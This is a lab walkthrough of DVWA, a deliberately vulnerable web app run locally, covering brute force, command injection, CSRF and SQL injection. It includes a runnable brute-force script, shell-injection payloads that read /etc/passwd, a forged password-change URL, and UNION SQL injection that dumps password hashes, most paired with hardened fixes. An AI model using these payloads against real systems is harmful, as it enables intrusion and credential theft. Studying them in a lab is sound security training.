Beginner level

Setup

docker run --rm -it -p 80:80 vulnerables/web-dvwa

Login : admin Password : admin

Click on create database.

Log in.

The first challenge.

Login : admin Password : password

Difficulty

DVWA Security : low.

Brute force

We try the most common combinations by hand. The solution is :

  • login : admin
  • password : password
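Trying combinations by hand does not scale, so here is an added example (not part of the original walkthrough) that automates the low-level Brute Force page from a short wordlist. It assumes, from DVWA's low-level form and not from this page, that the form submits a GET to /vulnerabilities/brute/ with the parameters username, password and Login=Login, that the request must carry the security=low cookie plus the PHPSESSID session cookie of a logged-in user, and that a successful attempt contains the text "Welcome to the password protected area". The fake_dvwa_fetch function is a constructed stand-in for the server so the script runs offline ; swap in make_http_fetch with a real session id to run it against the container.

```python
# Added example: automating the DVWA "Brute Force" page at security level
# low. Not part of the original walkthrough. Assumptions (not taken from the
# page): the form is submitted as a GET to /vulnerabilities/brute/ with the
# parameters username, password and Login=Login; the request needs the DVWA
# cookies security=low and PHPSESSID; a successful login contains the text
# "Welcome to the password protected area".
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Optional

SUCCESS_MARKER = "Welcome to the password protected area"  # assumed DVWA text


def build_login_url(base_url: str, username: str, password: str) -> str:
    """Build the GET URL the low-level brute force form submits."""
    query = urllib.parse.urlencode(
        {"username": username, "password": password, "Login": "Login"}
    )
    return f"{base_url.rstrip('/')}/vulnerabilities/brute/?{query}"


def make_http_fetch(phpsessid: str) -> Callable[[str], str]:
    """Return a fetch(url) that sends the DVWA cookies (hypothetical session id)."""
    def fetch(url: str) -> str:
        req = urllib.request.Request(
            url, headers={"Cookie": f"security=low; PHPSESSID={phpsessid}"}
        )
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode("utf-8", errors="replace")
    return fetch


def find_password(fetch: Callable[[str], str], base_url: str,
                  username: str, wordlist: Iterable[str]) -> Optional[str]:
    """Try each candidate password; return the first one the app accepts."""
    for candidate in wordlist:
        body = fetch(build_login_url(base_url, username, candidate))
        if SUCCESS_MARKER in body:
            return candidate
    return None


# Constructed offline stand-in for the DVWA server: it accepts admin/password
# and answers every other attempt with the failure message.
def fake_dvwa_fetch(url: str) -> str:
    params = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    if params.get("username") == ["admin"] and params.get("password") == ["password"]:
        return "<p>Welcome to the password protected area admin</p>"
    return "<pre><br />Username and/or password incorrect.</pre>"


COMMON_PASSWORDS = ["123456", "admin", "letmein", "password", "qwerty"]

if __name__ == "__main__":
    # Offline demo against the fake; use make_http_fetch("<PHPSESSID>") in
    # place of fake_dvwa_fetch to run against a real DVWA at http://localhost.
    print(find_password(fake_dvwa_fetch, "http://localhost", "admin", COMMON_PASSWORDS))
```

The fetch function is injected so the same loop works against the fake and against the real container ; note that DVWA at level low applies no lockout or delay, which is exactly why a plain loop over a wordlist is enough.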

Command injection

We enter 125.0.0.1 and get

PING 125.0.0.1 (125.0.0.1): 56 data bytes
--- 125.0.0.1 ping statistics ---
4 packets transmitted, 0 packets received, 100% packet loss

We try 125.0.0.1; id # (the ; ends the ping command, so the shell runs id as a second command, and # comments out anything the application might append after our input) and get

PING 125.0.0.1 (125.0.0.1): 56 data bytes
--- 125.0.0.1 ping statistics ---
4 packets transmitted, 0 packets received, 100% packet loss
uid=33(www-data) gid=33(www-data) groups=33(www-data)

The injected command runs as www-data, the web server user. We can display /etc/passwd with 125.0.0.1; cat /etc/passwd #.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false
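To see exactly what the shell does with 125.0.0.1; id #, and what stops it, here is an added example (not part of the original walkthrough) that models the vulnerable page in Python next to a hardened version. It assumes the server builds its command by concatenating the user input onto a ping command, roughly shell_exec('ping -c 4 ' . $target) ; "echo PING" stands in for the real ping binary so the demo runs offline, and a POSIX /bin/sh is assumed.

```python
# Added example: the command injection behind the "Command Injection" page,
# modelled in Python. Not part of the original walkthrough. It assumes the
# server builds its command by string concatenation, roughly
# shell_exec('ping -c 4 ' . $target); here a harmless "echo PING" stands in
# for the real ping binary so the demo runs offline (POSIX sh assumed).
import ipaddress
import shlex
import subprocess

PING_STANDIN = "echo PING"  # stand-in for "ping -c 4", so no network is needed


def run_vulnerable(target: str) -> str:
    """Vulnerable pattern: untrusted input pasted into a shell command line.

    With target = "125.0.0.1; id #" the shell runs two commands: the ping and
    then id; "#" comments out anything the application might append.
    """
    cmd = f"{PING_STANDIN} {target}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_hardened(target: str) -> str:
    """Hardened form: validate the value as an IP address and never use a shell.

    ipaddress.ip_address rejects anything that is not a literal IPv4/IPv6
    address, and passing an argv list (shell=False) means metacharacters such
    as ";", "|" or "$(...)" are never interpreted by a shell.
    """
    try:
        addr = ipaddress.ip_address(target.strip())
    except ValueError as exc:
        raise ValueError(f"refusing non-IP target {target!r}") from exc
    argv = shlex.split(PING_STANDIN) + [str(addr)]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def is_injected(output: str) -> bool:
    """True if something other than the ping stand-in produced output."""
    return any(not line.startswith("PING") for line in output.splitlines())


if __name__ == "__main__":
    payload = "125.0.0.1; echo INJECTED #"   # same shape as "125.0.0.1; id #"
    print(run_vulnerable(payload))            # PING 125.0.0.1 / INJECTED
    try:
        run_hardened(payload)
    except ValueError as exc:
        print("hardened:", exc)
    print(run_hardened("125.0.0.1"))          # PING 125.0.0.1 only
```

Both halves of the fix matter : validating the input as an IP address removes the metacharacters, and dropping the shell means that even if validation is bypassed later the value is only ever one argv element of the ping process.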

CSRF

We use ZAP proxy for that challenge.

We create a context for localhost to navigate through the requests more easily. We do a password change and see that the new password is sent as GET parameters :

http://localhost/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=Change

So if we send this URL, with a password of our choosing, to a logged-in admin and make him click on it, the password is changed without him knowing : the browser attaches his session cookie automatically and the request carries nothing (no token) that a third party could not forge. A click is not even needed ; any page he visits can trigger the GET by embedding the URL in an img tag.

We can try it by entering this URL in our browser :

http://localhost/vulnerabilities/csrf/?password_new=pass&password_conf=pass&Change=Change

And we land on the password changed page.
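To show why the forged URL works and what the fix looks like, here is an added example (not part of the original walkthrough). It models the low-level handler in Python, assuming only what the page shows (a GET with matching password_new and password_conf and Change=Change changes the password, with no other check), next to a hardened handler that accepts a POST only and requires a per-session anti-CSRF token in a user_token field. The Request, Session and demo names, and the response strings, are this example's own.

```python
# Added example: why the forged URL works, and what stops it. Not part of
# the original walkthrough. Models the DVWA low-level handler (assumed
# behaviour: a GET with password_new == password_conf and Change=Change
# changes the password, no other check) next to a hardened handler that
# only accepts a POST carrying a per-session anti-CSRF token.
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict
from urllib.parse import parse_qs, urlsplit


@dataclass
class Request:
    method: str
    url: str
    form: Dict[str, str] = field(default_factory=dict)  # POST body fields

    @property
    def params(self) -> Dict[str, str]:
        """Query-string parameters, as the low handler reads them ($_GET)."""
        return {k: v[0] for k, v in parse_qs(urlsplit(self.url).query).items()}


@dataclass
class Session:
    password: str = "password"
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


def change_password_low(req: Request, session: Session) -> str:
    """Vulnerable: any request whose two fields match changes the password.

    The browser attaches the session cookie automatically, so a URL loaded
    from another site (a link, or an <img src=...>) has the same effect as
    the admin submitting the form himself.
    """
    p = req.params
    new = p.get("password_new")
    if p.get("Change") == "Change" and new is not None and new == p.get("password_conf"):
        session.password = new
        return "Password Changed."
    return "Passwords did not match."


def change_password_hardened(req: Request, session: Session) -> str:
    """Hardened: POST only, and the form must carry the session's CSRF token.

    The token lives in the session and is written into the legitimate form,
    so a third-party page cannot know it; hmac.compare_digest avoids a
    timing side channel on the comparison.
    """
    if req.method != "POST":
        return "Method not allowed."
    token = req.form.get("user_token", "")
    if not hmac.compare_digest(token, session.csrf_token):
        return "CSRF token is incorrect."
    new = req.form.get("password_new")
    if new and new == req.form.get("password_conf"):
        session.password = new
        return "Password Changed."
    return "Passwords did not match."


# The forged URL from the walkthrough, replayed against both handlers.
FORGED_URL = "http://localhost/vulnerabilities/csrf/?password_new=pass&password_conf=pass&Change=Change"
FORM_URL = "http://localhost/vulnerabilities/csrf/"


def demo() -> Dict[str, str]:
    results = {}
    victim = Session()
    results["low"] = change_password_low(Request("GET", FORGED_URL), victim)
    results["low_password"] = victim.password

    victim = Session()
    results["hardened_forged"] = change_password_hardened(Request("GET", FORGED_URL), victim)
    # Even a forged POST fails without the token...
    results["hardened_no_token"] = change_password_hardened(
        Request("POST", FORM_URL,
                {"password_new": "pass", "password_conf": "pass", "Change": "Change"}), victim)
    # ...while the real form, which embeds the token, succeeds.
    results["hardened_legit"] = change_password_hardened(
        Request("POST", FORM_URL,
                {"password_new": "pass", "password_conf": "pass",
                 "Change": "Change", "user_token": victim.csrf_token}), victim)
    results["hardened_password"] = victim.password
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Switching to POST alone is not a fix (a hidden auto-submitting form forges a POST just as easily) ; it is the session-bound token, which the attacker's page cannot read, that breaks the attack.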

SQL Injection

We try 1 and get :

ID: 1
First name: admin
Surname: admin

We try to enter ' as the User ID and get the following error.

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''''' at line 1

So we now know that the DB used is MariaDB. We should be able to extract some information now.

We try the following input

1'  UNION ALL SELECT * FROM information_schema.TABLES; #

And get the error The used SELECT statements have a different number of columns.

Fair enough, it seems that we need to restrict our SELECT to three columns, as we were given ID, First name and Surname in our first answer.

So we try the following command :

1'  UNION ALL SELECT TABLE_CATALOG, TABLE_NAME, TABLE_TYPE FROM information_schema.TABLES; #

And get the same error. Hmm…

If we try one column less ?

1'  UNION ALL SELECT TABLE_NAME, TABLE_TYPE FROM information_schema.TABLES; #

Bingo ! We get a load of information. The catch was that the ID line in the output is just our input echoed back, not a column returned by the query : the SELECT only returns two columns (first name and surname), so the UNION must have two as well. That is also why we see our SQLi reflected back to us in every row :

ID: 1'  UNION ALL SELECT TABLE_NAME, TABLE_TYPE FROM information_schema.TABLES; #  ;#
First name: INNODB_FT_DELETED
Surname: SYSTEM VIEW

ID: 1'  UNION ALL SELECT TABLE_NAME, TABLE_TYPE FROM information_schema.TABLES; #  ;#
First name: INNODB_TABLESPACES_SCRUBBING
Surname: SYSTEM VIEW
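The column-count trial and error above, and the parameterized query that closes the hole, reproduced offline as an added example (not part of the original walkthrough). It assumes the low-level query has the shape SELECT first_name, last_name FROM users WHERE user_id = '<id>'; built by string concatenation. It uses sqlite3 instead of MariaDB, which changes two things stated up front : sqlite has no # comment, so the payloads end in -- instead, and its catalogue is sqlite_master(name, type) rather than information_schema.TABLES(TABLE_NAME, TABLE_TYPE). The users rows are constructed sample data.

```python
# Added example: the UNION injection from the walkthrough, reproduced offline
# with sqlite3. Not part of the original page. Assumed low-level query shape:
#   SELECT first_name, last_name FROM users WHERE user_id = '<id>';
# Differences from MariaDB: sqlite has no "#" comment, so the payloads end in
# "-- " instead, and its catalogue is sqlite_master(name, type) rather than
# information_schema.TABLES(TABLE_NAME, TABLE_TYPE).
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed sample database with the two columns the page reveals."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [(1, "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
         (2, "Gordon", "Brown", "e99a18c4428cb38d5f260853678922e3")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> List[Tuple]:
    """String concatenation, as the low-level page does: the input becomes SQL."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}';"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, user_id: str) -> List[Tuple]:
    """Hardened form: the value is bound as data and never parsed as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?;"
    return conn.execute(sql, (user_id,)).fetchall()


# Payloads from the walkthrough, adapted to sqlite's comment syntax.
THREE_COLUMNS = "1' UNION ALL SELECT name, type, sql FROM sqlite_master -- "
TWO_COLUMNS = "1' UNION ALL SELECT name, type FROM sqlite_master -- "
# Once the column count is known, the same trick reads any two columns,
# here the password hashes of the users table.
DUMP_PASSWORDS = "1' UNION ALL SELECT first_name, password FROM users -- "


def column_count_error(conn: sqlite3.Connection, payload: str) -> bool:
    """True if the payload fails the way the 3-column attempt did on the page."""
    try:
        lookup_vulnerable(conn, payload)
        return False
    except sqlite3.OperationalError as exc:
        return "same number of result columns" in str(exc)


if __name__ == "__main__":
    conn = make_db()
    print(lookup_vulnerable(conn, "1"))              # [('admin', 'admin')]
    print(column_count_error(conn, THREE_COLUMNS))   # True: 2 columns vs 3
    print(lookup_vulnerable(conn, TWO_COLUMNS))      # admin row + catalogue rows
    print(lookup_vulnerable(conn, DUMP_PASSWORDS))   # admin row + name/hash pairs
    print(lookup_parameterized(conn, TWO_COLUMNS))   # []  (no row has that id)
```

The same two-column payload fed to the parameterized version returns nothing, because the whole string is compared against user_id as a value ; that is the fix DVWA applies at its higher levels and the one to apply in real code.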

SQL Blind